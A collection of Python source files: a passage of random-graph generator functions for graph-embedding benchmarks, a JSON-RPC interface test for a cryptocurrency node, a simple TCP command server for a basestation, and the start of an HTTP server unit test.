The 2*m1+m2 nodes are numbered
0,...,m1-1 for the left barbell,
m1,...,m1+m2-1 for the path,
and m1+m2,...,2*m1+m2-1 for the right barbell.
"""
graph = nx.barbell_graph(m1,m2)
## for com_nc, one hot
#onehot_com = np.array([[1,0,0]]*m1+[[0,1,0]]*m2+[[0,0,1]]*m1) is slower when num of nodes > 2000
node_labels_com = np.zeros(m1*2+m2).astype(int)
node_labels_com[m1:m1+m2] = 2
node_labels_com[m1+m2:] = 1
## one hot
onehot_com = np.zeros((m1*2+m2,3)).astype(int)
onehot_com[np.arange(m1*2+m2), node_labels_com] = 1
## for role_nc, one hot
node_labels_role = np.zeros(m1*2+m2).astype(int)
p,q = divmod(m2, 2)
for i in range(p+1):
node_labels_role[[m1-1+i,m1+m2-i]] = i+1
if q:
node_labels_role[m1+p] = p+2
onehot_role = np.zeros((m1*2+m2,p+q+2)).astype(int)
onehot_role[np.arange(m1*2+m2), node_labels_role] = 1
return graph, scipy.sparse.csr_matrix(onehot_com), scipy.sparse.csr_matrix(onehot_role)
##########################################################################
def binary_community_graph(N, k, maxk, mu):
"""Retruns a binary community graph. """
if sys.platform[0] == "w":
args = ["gemben/c_exe/benchm.exe"]
fcall = "gemben/c_exe/benchm.exe"
else:
args = ["gemben/c_exe/benchm"]
fcall = "gemben/c_exe/benchm"
args.append("-N %d" % N)
args.append("-k %d" % k)
args.append("-maxk %d" % maxk)
args.append("-mu %f" % mu)
t1 = time()
print(args)
try:
os.system("%s -N %d -k %d -maxk %d -mu %f" % (fcall, N, k, maxk, mu))
# call(args)
except Exception as e:
print('ERROR: %s' % str(e))
print('gemben/c_exe/benchm not found. Please compile gf, place benchm in the path and grant executable permission')
t2 = time()
print('\tTime taken to generate random graph: %f sec' % (t2 - t1))
try:
graph = graph_util.loadGraphFromEdgeListTxt('gemben/c_exe/network.dat')
node_labels = np.loadtxt('gemben/c_exe/community.dat')
except:
graph = graph_util.loadGraphFromEdgeListTxt('network.dat')
node_labels = np.loadtxt('community.dat')
node_labels = node_labels[:, -1].reshape(-1, 1)
enc = OneHotEncoder()
return graph, enc.fit_transform(node_labels)
########################################################################
def barabasi_albert_graph(N, deg, dia,dim, domain):
''' Return random graph using Barabási-Albert preferential attachment model.
Args:
n (int): Number of Nodes
deg (int): Degree of the graphs
dia (float): diameter of the graph
dim (int):
m: Number of edges to attach from a new node to existing nodes
Formula for m: (m^2)- (Nm)/2 + avg_deg * (N/2) = 0 => From this equation we need to find m :
:return: Graph Object
Returns:
Object: Best graph, beast average degree and best diameter.
'''
## Calculating thof nodes: 10\nNumber of edges: 16\nAverage degree: 3.2000'
## As does not have for Diameter Variance
if dia > 0:
return None
strt_time = time()
m = int(round((N - np.sqrt(N**2 - 4*deg*N))/4))
G = nx.barabasi_albert_graph(n=N, m=m)
lcc, _ = graph_util.get_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: Barabasi Albert Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ' , end_time - strt_time, ' secs')
return best_G, best_avg_deg, best_diam
########################################################################################################################
def random_geometric_graph(N, deg, dia, dim, domain):
''' Return the random geometric graph in the unit cube.
The random geometric graph model places n nodes uniformly at random
in the unit cube Two nodes `u,v` are connected with an edge if
`d(u,v)<=r` where `d` is the Euclidean distance and `r` is a radius
threshold.
Average Degree is given by formula: Avg_Deg = (pi*(r^2)*num_nodes)/(l^2)
Formula for r: avg_deg * l
where l can be considered a constant where its square can be approximated to
1.04 [ength of square] Empirically Found
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
l = 1.04
count = 0
tolerance = 0.5
curr_deg_error = float('inf')
while tolerance < curr_deg_error:
r = np.round(np.sqrt((deg * l ) / (3.14 * N)), 3)
G = nx.random_geometric_graph(n=N, radius=r)
curr_avg_deg = np.mean(list(dict(nx.degree(G)).values()))
lcc = graph_util.get_lcc_undirected(G)[0]
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = curr_avg_deg
end_time = time()
print('Graph_Name: Random_Geometric_Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################################################################
def waxman_graph(N, deg, dia, dim, domain):
'''Return a Waxman random graph.
The Waxman random graph models place n nodes uniformly at random
in a rectangular domain. Two nodes u,v are connected with an edge
with probability
Parameters of the graph:
n (int or iterable) – Number of nodes or iterable of nodes
beta (float) – Model parameter
alpha (float) – Model parameter
Average Degree is given by formula: k
where P = beta * exp(-d/alpha*L)
alpha = (gamma((k/2)+1) * (beta^k))/((n-1)*(pi^(k/2))*gamma(k))
where beta is chosen randomly to satisfy the average degree criterion
So we fix the parameter beta = 0.1, and we know the default value of d/L is in range: 0.25 to 0.3 (Empiricially calculated)
so we only tweak alpha to get the required avg deg.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
bands = 10
lower_lim = 2.5
upper_lim = 3.5
tolerance = 0.5
k = 2
curr_avg_deg_error = float('inf')
flag = False
while curr_avg_deg_error >= tolerance:
s_space = np.linspace(lower_lim, upper_lim, bands)
avg_deg_error_list = []
s_gap = s_space[1] - s_space[0]
for s in s_space:
g_s = (k * (pi ** (k / 2)) * special.gamma(k)) / (special.gamma((k / 2) + 1) * (s ** k))
q = deg/((N-1)*g_s)
G = nx.waxman_graph(n=N, alpha=s, beta=q)
lcc = graph_util.get_lcc_undirected(G)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
avg_deg_err = abs(curr_avg_deg - deg)
if avg_deg_err <= tolerance:
best_G = G
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
flag = True
break
avg_deg_error_list.append((lcc,avg_deg_err , curr_avg_deg, s))
if flag == True:
break
sorted_avg_err = sorted(avg_deg_error_list, key=lambda x: x[1])
curr_avg_deg_error = sorted_avg_err[0][1]
if sorted_avg_err[0][1] <= tolerance:
best_G = sorted_avg_err[0][0]
best_avg_deg = sorted_avg_err[0][2]
best_diam = nx.algorithms.diameter(best_G)
break
else:
lower_lim = sorted_avg_err[0][3] - s_gap
upper_lim = sorted_avg_err[0][3] + s_gap
end_time = time()
print('Graph_Name: waxman_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def watts_strogatz_graph(N, deg, dia, dim, domain):
'''Return a Watts-Strogatz small-world graph.
First create a ring over n nodes. Then each node in the ring is
connected with its k nearest neighbors (k-1 neighbors if k is odd).
Then shortcuts are created by replacing some edges as follows:
for each edge u-v in the underlying "n-ring with k nearest neighbors"
with probability p replace it with a new edge u-w with uniformly
random choice of existing node w.
Parameters of the graph:
n (int) – The number of nodes
k (int) – Each node is joined with its k nearest neighbors in a ring topology.
p (float) – The probability of rewiring each edge
Average Degree is solely decided by k
Diameter depends on the value of p
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
p = 0.2
G = nx.watts_strogatz_graph(n=N, k=deg, p=p)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: Watts_Strogatz_Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def duplication_divergence_graph(N, deg, dia, dim, domain):
'''Returns an undirected graph using the duplication-divergence model.
A graph of ``n`` nodes is created by duplicating the initial nodes
and retaining edges incident to the original nodes with a retention
probability ``p``.
Parameters of the graph:
n (int) – The desired number of nodes in the graph.
p (float) – The probability for retaining the edge of the replicated node.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
tolerance = 0.5
if deg == 4:
lower_lim = 0.3
upper_lim = 0.4
bands = 10
elif deg == 6:
lower_lim = 0.4
upper_lim = 0.6
bands = 15
elif deg == 8:
lower_lim = 0.46
upper_lim = 0.60
bands = 15
elif deg == 10:
lower_lim = 0.50
upper_lim = 0.65
bands = 15
elif deg == 12:
lower_lim = 0.55
upper_lim = 0.68
bands = 15
flag = False
curr_avg_deg_error = float('inf')
while curr_avg_deg_error > tolerance:
p_space = np.linspace(lower_lim, upper_lim, bands)
avg_deg_err_list = []
p_gap = p_space[1] - p_space[0]
for p_val in p_space:
G = nx.duplication_divergence_graph(n=N, p=p_val)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_avg_deg_error = abs(deg - curr_avg_deg)
avg_deg_err_list.append((lcc, curr_avg_deg_error, p_val, curr_avg_deg))
if deg - curr_avg_deg < 0:
break
if curr_avg_deg_error <= tolerance:
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(best_G)
flag = True
break
if flag == True:
break
sorted_avg_err = sorted(avg_deg_err_list, key=lambda x: x[1])
curr_avg_deg_error = sorted_avg_err[0][1]
if sorted_avg_err[0][1] <= tolerance:
best_G = sorted_avg_err[0][0]
best_avg_deg = sorted_avg_err[0][3]
best_diam = nx.algorithms.diameter(best_G)
break
else:
lower_lim = sorted_avg_err[0][2] - p_gap
upper_lim = sorted_avg_err[0][2] + p_gap
end_time = time()
print('Graph_Name: duplication divergence graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def powerlaw_cluster_graph(N, deg, dia, dim, domain):
'''Holme and Kim algorithm for growing graphs with powerlaw
degree distribution and approximate average clustering.
The average clustering has a hard time getting above a certain
cutoff that depends on ``m``. This cutoff is often quite low. The
transitivity (fraction of triangles to possible triangles) seems to
decrease with network size.
It is essentially the Barabási–Albert (BA) growth model with an
extra step that each random edge is followed by a chance of
making an edge to one of its neighbors too (and thus a triangle).
This algorithm improves on BA in the sense that it enables a
higher average clustering to be attained if desired.
It seems possible to have a disconnected graph with this algorithm
since the initial ``m`` nodes may not be all linked to a new node
on the first iteration like the BA model.
Parameters of the graph:
n (int) – the number of nodes
m (int) – the number of random edges to add for each new node
p (float,) – Probability of adding a triangle after adding a random edge
Formula for m: (m^2)- (Nm)/2 + avg_deg * (N/2) = 0 => From this equation we need to find m :
p : Does not vary the average degree or diameter so much. : Higher value of p may cause average degree to overshoot intended average_deg
so we give the control of average degree to parameter m: by setting a lower value of p: 0.1
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
## Calculating thof nodes: 10\nNumber of edges: 16\nAverage degree: 3.2000'
strt_time = time()
m = int(round((N - np.sqrt(N ** 2 - 4 * deg * N)) / 4))
p = 0.2
## G at center:
G = nx.powerlaw_cluster_graph(n=N, m=m, p=p)
lcc, _ = graph_util.get_nk_lcc_undirected(G)
best_G = lcc
best_diam = nx.algorithms.diameter(best_G)
best_avg_deg = np.mean(list(dict(nx.degree(best_G)).values()))
end_time = time()
print('Graph_Name: powerlaw_cluster_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
def stochastic_block_model(N, deg, dia, dim, domain):
'''Returns a stochastic block model graph.
This model partitions the nodes in blocks of arbitrary sizes, and places
edges between pairs of nodes independently, with a probability that depends
on the blocks.
:param N: Number of Nodes
:param p: Element (r,s) gives the density of edges going from the nodes of group r
to nodes of group s. p must match the number of groups (len(sizes) == len(p)),
and it must be symmetric if the graph is undirected.
Formula for p: Through Empirical Studies - p = 0.001 * Deg gives perfect result for Num_of_Nodes = 1024
But if N >1024: scaler = N/1024 : then p = (0.001*deg)/scaler
And if N < 1024 : Scaler = 1024/N : then p = (0.001*deg)*scaler
and if N == 1024: p = (0.001*deg)
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
p_default = 0.001 * deg
N_default = 1024
if N_default > N:
p_scaler = N_default/N
p = p_default * p_scaler
elif N_default < N:
p_scaler = N / N_default
p = p_default / p_scaler
else:
p = p_default
strt_time = time()
while curr_deg_error > tolerance:
G = nx.generators.stochastic_block_model([N],[[p]])
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(G)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: Stochastic Block Model')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
def r_mat_graph(N, deg, dia, dim, domain):
"""Generates static R-MAT graphs.
R-MAT (recursive matrix) graphs are random graphs with
n=2^scale nodes and m=n*edgeFactor edges. More details
at http://www.graph500.org or in the original paper: Deepayan Chakrabarti,
Yiping Zhan,
Christos Faloutsos: R-MAT: A Recursive Model for Graph Mining.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
"""
import networkit as nk
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
strt_time = time()
scale = np.log2(N)
while curr_deg_error > tolerance:
G_Nk = nk.generators.RmatGenerator(scale=scale,edgeFactor=deg/2, a=0.25,b=0.25,c=0.25,d=0.25).generate()
G = graph_util.convertNkToNx(G_Nk)
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
if count == 1000:
raise("MAX TRIES EXCEEDED, TRY AGAIN")
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: RMAT')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
def hyperbolic_graph(N, deg, dia, dim, domain):
'''The Hyperbolic Generator distributes points in hyperbolic space and adds edges
between points with a probability depending on their distance.
The resulting graphs have a power-law degree distribution, small diameter
and high clustering coefficient. For a temperature of 0, the model resembles
a unit-disk model in hyperbolic space.
Parameters of the graph:
N = Num of nodes
k = Average degree
gamma = Target exponent in Power Law Distribution
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
import networkit as nk
tolerance = 0.5
curr_deg_error = float('inf')
count = 0
strt_time = time()
while curr_deg_error > tolerance:
G_Nk = nk.generators.HyperbolicGenerator(n = N,k = deg,gamma = 3.5).generate()
G = graph_util.convertNkToNx(G_Nk)
lcc,_ = graph_util.get_nk_lcc_undirected(G)
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
curr_deg_error = abs(curr_avg_deg - deg)
count += 1
if count == 1000:
break
best_G = lcc
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
end_time = time()
print('Graph_Name: Hyperbolic Graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
########################################################################
def stochastic_kronecker_graph(N, deg, dia, dim, domain):
'''Generates stochastic kronecker graph.
The stochastic Kronecker graph model introduced by Leskovec etal.
is a random graph with vertex setZn2, where two verticesuandvare connected
with probability `αu·vγ(1−u)·(1−v)βn−u·v−(1−u)·(1−v)` in-dependently of the
presence or absence of any other edge, for fixedparameters `0< α,β,γ <1`.
They have shown empirically that the de-gree sequence resembles a power law degree distribution.
In this paperwe show that the stochastic Kronecker graph a.a.s. does not feature apower
law degree distribution for any parameters `0< α,β,γ <1`.
Parameters of the graph:
degree_seq
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
nodes = 2
init = kronecker_init_matrix.InitMatrix(nodes)
init.make()
# Alpha Beta Method of Testing
init.addEdge(0, 1)
init.addSelfEdges()
tolerance = 0.5
## Write Custom Params
avg_deg_error = float('inf')
max_tries = 1000
count =0
if domain == "social":
alphas, betas, gammas = [0.999], np.linspace(0.45, 0.8, 10), np.linspace(0.2, 0.4, 10)
elif domain == "biology":
alphas, betas, gammas = [0.85], np.linspace(0.6, 0.95, 10), np.linspace(0.01, 0.15, 10)
elif domain == "internet":
alphas, betas, gammas = np.linspace(0.95, 0.99, 10), np.linspace(0.55, 0.8, 10), np.linspace(0.05, 0.25, 10)
elif domain == "citation":
alphas, betas, gammas = [0.999], np.linspace(0.35, 0.6, 10), np.linspace(0.2, 0.8, 10)
else:
alphas, betas, gammas = np.linspace(0.1, 1.0, 20), np.linspace(0.1, 1.0, 20), np.linspace(0.1, 1.0, 20)
while count < max_tries:
FLAG = False
for alpha, beta, gamma in itertools.product(*[alphas, betas, gammas]):
init.makeStochasticCustom(np.asarray([alpha, beta, beta, gamma]))
k = round(np.log2(N))
best_G = kronecker_generator.generateStochasticKron(init, k)
lcc = graph_util.get_lcc_undirected(best_G)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
#print(curr_avg_deg)
curr_diam = nx.algorithms.diameter(lcc)
avg_deg_error = abs(curr_avg_deg-deg)
if avg_deg_error < tolerance:
FLAG = True
break
if FLAG:
break
count += 1
end_time = time()
print('Graph_Name: Stochastic Kronecker Graph')
print('Num_Nodes: ', nx.number_of_nodes(lcc), ' Avg_Deg : ', curr_avg_deg, ' Diameter: ', curr_diam)
print('TIME: ', end_time - strt_time)
return lcc, curr_avg_deg, curr_diam
########################################################################################################################
def lfr_benchmark_graph(N, deg, dia, dim, domain):
'''Returns the LFR benchmark graph for testing community-finding
algorithms.
Parameters of the graph:
n (int) – Number of nodes in the created graph.
tau1 (float) – Power law exponent for the degree distribution of the created graph. This value must be strictly greater than one.
tau2 (float) – Power law exponent for the community size distribution in the created graph. This value must be strictly greater than one.
mu (float) – Fraction of intra-community edges incident to each node. This value must be in the interval [0, 1].
average_degree (float) – Desired average degree of nodes in the created graph. This value must be in the interval [0, n]. Exactly one of this and min_degree must be specified, otherwise a NetworkXError is raised.
Args:
n (int or iterable) – Number of nodes or iterable of nodes
dia (float) – Distance threshold value
dim (int, optional): Dimension of the graph
domain (str, optional): Domain of the graph
Returns:
Object: Best graph, beast average degree and best diameter.
'''
strt_time = time()
tau1 = [1.5, 2, 2.5, 3]
tau2 = [1.5, 2, 2.5, 3]
mu = [0.1,0.5]
min_community = [20, 40, 60, 80, 100]
import itertools
params = list(itertools.product(*[tau1, tau2, mu, min_community]))
avg_deg_for_plot = []
max_tries = 2000
count = 0
tolerance = 0.5
flag = False
def lfr_call(G, N, tau1, tau2, mu, deg, min_comm):
try:
# print('CALLED')
G['graph'] = nx.community.community_generators.LFR_benchmark_graph(n=N, tau1=tau1, tau2=tau2, mu=mu,
average_degree=deg, min_community=min_comm)
except:
G = None
pass
manager = multiprocessing.Manager()
while count < max_tries:
for tup in params:
try:
G1 = manager.dict()
lfr_process = multiprocessing.Process(target=lfr_call, name="LFR", args=(G1, N, tup[0],tup[1], tup[2], deg, tup[3]))
lfr_process.start()
lfr_process.join(10)
if lfr_process.is_alive():
lfr_process.terminate()
lfr_process.join()
continue
if not G1:
continue
G1 = G1['graph']
lcc = graph_util.get_lcc_undirected(G1)[0]
curr_avg_deg = np.mean(list(dict(nx.degree(lcc)).values()))
avg_deg_for_plot.append(curr_avg_deg)
# print(deg, ' : CURR_AVG_DEG : ', curr_avg_deg)
curr_deg_error = abs(curr_avg_deg - deg)
if curr_deg_error < tolerance:
best_G = G1
best_avg_deg = curr_avg_deg
best_diam = nx.algorithms.diameter(lcc)
flag = True
break
except:
continue
if flag == True:
break
count += 1
# plot_hist('LFR_PLOT_DEG',avg_deg_for_plot)
if count >= max_tries:
raise('MAX_NUM_ITERATIONS Reached. Retry')
end_time = time()
print('Graph_Name: lfr_benchmark_graph')
print('Num_Nodes: ', nx.number_of_nodes(best_G), ' Avg_Deg : ', best_avg_deg, ' Diameter: ', best_diam)
print('TIME: ', end_time - strt_time)
return best_G, best_avg_deg, best_diam
#####################################################################
if __name__=='__main__':
N= [256, 512, 1024, 2048, 4096]
Deg = [4, 6, 8, 10, 12]
default_dia = 0
default_dim = 128
for domain in ["social", "biology", "internet"]:
for deg in [4, 6, 8, 10, 12]:
stochastic_kronecker_graph(1024, deg, 0, 128, domain)
for n in [256, 512, 1024, 2048, 4096]:
stochastic_kronecker_graph(n, 8, 0, 128, domain)
# G, _, _ = barabasi_albert_graph(1024, 8, 0, 128)
# G,something = graph_util.get_lcc(G.to_directed())
# print(type(G))
# print(G)
import itertools
all_combos = list(itertools.product(*[N, Deg]))
# all_graphs = [watts_strogatz_graph, duplication_divergence_graph, powerlaw_cluster_graph, stochastic_block_model, r_mat_graph, hyperbolic_graph, stochastic_block_model]
# all_graph_names = ["watts_strogatz_graph",
# "duplication_divergence_graph", "powerlaw_cluster_graph", "stochastic_block_model", "r_mat_graph",
# "hyperbolic_graph", "stochastic_block_model"]
G,_,_ = lfr_benchmark_graph(1024,8,0,128)
print(type(G))
# all_graphs = [lfr_benchmark_graph]
# all_graph_names = ["lfr_benchmark_graph"]
#
# for ind, active_graph in enumerate(all_graphs):
# print('********************************** ',all_graph_names[ind])
# for combi in all_combos:
# best_graph, best_avg_deg, best_dia = active_graph(combi[0], combi[1], default_dia, default_dim)
# print('N : '+str(combi[0]) + ' Deg : ' + str(combi[1]) +' CURR_AVG_DEG : ',str(best_avg_deg), ' BEST_DIA : ', str(best_dia))
# print('_____________________________________________________________________________________')
# diam_list = []
# avg_deg_list = []
#
# graph_name = 'Barabasi Albert Graph'
# max_iters = 1000
# graph_name_diam = '../diam_plots/'+graph_name+'_diam_'+str(max_iters)
# graph_name_deg = '../diam_plots/' + graph_name + '_deg'+str(max_iters)
#
# while(len(diam_list))<max_iters:
# print('_____________________ ITER:',len(diam_list))
# G, avg_deg,diam = hyperbolic_graph(N=1024, deg=8,dia=0,dim=128)
# if np.round(abs(avg_deg - 8),1) <= 0.3:
#
# diam_list.append(diam)
# avg_deg_list.append(avg_deg)
# plot_hist(graph_name_diam, diam_list)
# plot_hist(graph_name_deg, avg_deg_list)
|
interface_rpc.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The thecoffeecoins Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests some generic aspects of the RPC interface."""
import os
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import thecoffeecoinsTestFramework
from test_framework.util import assert_equal, assert_greater_than_or_equal
from threading import Thread
import subprocess
def expect_http_status(expected_http_status, expected_rpc_code,
fcn, *args):
try:
fcn(*args)
raise AssertionError("Expected RPC error %d, got none" % expected_rpc_code)
except JSONRPCException as exc:
assert_equal(exc.error["code"], expected_rpc_code)
assert_equal(exc.http_status, expected_http_status)
def test_work_queue_getblock(node, got_exceeded_error):
while not got_exceeded_error:
try:
node.cli('getrpcinfo').send_cli()
except subprocess.CalledProcessError as e:
assert_equal(e.output, 'error: Server response: Work queue depth exceeded\n')
got_exceeded_error.append(True)
class RPCInterfaceTest(thecoffeecoinsTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def test_getrpcinfo(self):
self.log.info("Testing getrpcinfo...")
info = self.nodes[0].getrpcinfo()
assert_equal(len(info['active_commands']), 1)
command = info['active_commands'][0]
assert_equal(command['method'], 'getrpcinfo')
assert_greater_than_or_equal(command['duration'], 0)
assert_equal(info['logpath'], os.path.join(self.nodes[0].datadir, self.chain, 'debug.log'))
def test_batch_request(self):
self.log.info("Testing basic JSON-RPC batch request...")
results = self.nodes[0].batch([
# A basic request that will work fine.
{"method": "getblockcount", "id": 1},
# Request that will fail. The whole batch request should still
# work fine.
{"method": "invalidmethod", "id": 2},
# Another call that should succeed.
{"method": "getblockhash", "id": 3, "params": [0]},
])
result_by_id = {}
for res in results:
result_by_id[res["id"]] = res
assert_equal(result_by_id[1]['error'], None)
assert_equal(result_by_id[1]['result'], 0)
assert_equal(result_by_id[2]['error']['code'], -32601)
assert_equal(result_by_id[2]['result'], None)
assert_equal(result_by_id[3]['error'], None)
assert result_by_id[3]['result'] is not None
def test_http_status_codes(self):
self.log.info("Testing HTTP status codes for JSON-RPC requests...")
expect_http_status(404, -32601, self.nodes[0].invalidmethod)
expect_http_status(500, -8, self.nodes[0].getblockhash, 42)
def test_work_queue_exceeded(self):
self.log.info("Testing work queue exceeded...")
self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
got_exceeded_error = []
threads = []
for _ in range(3):
t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
t.start()
threads.append(t)
for t in threads:
t.join()
def run_test(self):
self.test_getrpcinfo()
self.test_batch_request()
self.test_http_status_codes()
self.test_work_queue_exceeded()
if __name__ == '__main__':
RPCInterfaceTest().main()
|
TCP.py
|
#!/usr/bin/python
from socket import *
import multiprocessing, time, signal, os, sys, threading, socket
from threading import Thread
PORT = 10000
IP = ""
class TCP(object):
tcp = None
def __init__(self):
self.server_socket = socket.socket(AF_INET, SOCK_STREAM)
self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server_socket.bind( (IP, PORT) )
self.server_socket.listen(1)
self.thread_tcp = Thread(target = self.run)
self.thread_tcp.start()
self.command = ""
self.active = False
TCP.tcp = self
def isConnected(self):
"""
:return true if connection is active
"""
return self.active
def set_command(self, command):
self.command = command
def get_command(self):
temp = self.command
self.command = ""
return temp
def send_to_basestation(self, key, value):
"""
Sends information back to the basestation. can only execute if the
connection is active
"""
if self.active:
# connection is active, send
try:
message = "<<<<" + key + "," + value + ">>>>"
# appending \n to the message as java reader socket blocks until new line is encountered
self.connectionSocket.send(message + "\n")
except socket.error as e:
print("Send failed")
else:
print("Send failed")
def run(self):
while TCP.tcp is None:
time.sleep(1)
while True:
print("Waiting for connection")
self.connectionSocket, self.addr = self.server_socket.accept()
self.connectionSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
print("Connection accepted")
self.active=True
while self.active:
command = ""
while self.active:
try:
lastLen = len(command)
command += self.connectionSocket.recv(1024).decode()
if lastLen == len(command):
print("Connection Lost")
self.active = False
lastLen = -1
break
except socket.error as e:
print("Connection Lost")
self.active = False
break
end_index = command.find(">>>>")
# In case of command overload
while end_index > 0:
self.set_command(command[0:end_index+4])
command = command[end_index+4:]
end_index = command.find(">>>>")
|
test_all_ctrls.py
|
# coding: utf-8
import os
from typing import Dict
import websocket
import unittest
from threading import Thread
from time import sleep
import urllib.request
import urllib.error
import http.client
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("http_test")
class HttpRequestTest(unittest.TestCase):
PORT = 9090
WAIT_COUNT = 10
@classmethod
def start_server(clz):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
server.start(
port=clz.PORT,
resources={"/public/*": f"{root}/tests/static"},
prefer_coroutine=True)
@classmethod
def setUpClass(clz):
Thread(target=clz.start_server, daemon=False, name="t").start()
retry = 0
while not server.is_ready():
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{clz.WAIT_COUNT} ")
if retry >= clz.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(clz):
try:
server.stop()
except:
pass
@classmethod
def visit(clz, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{clz.PORT}/{ctx_path}")
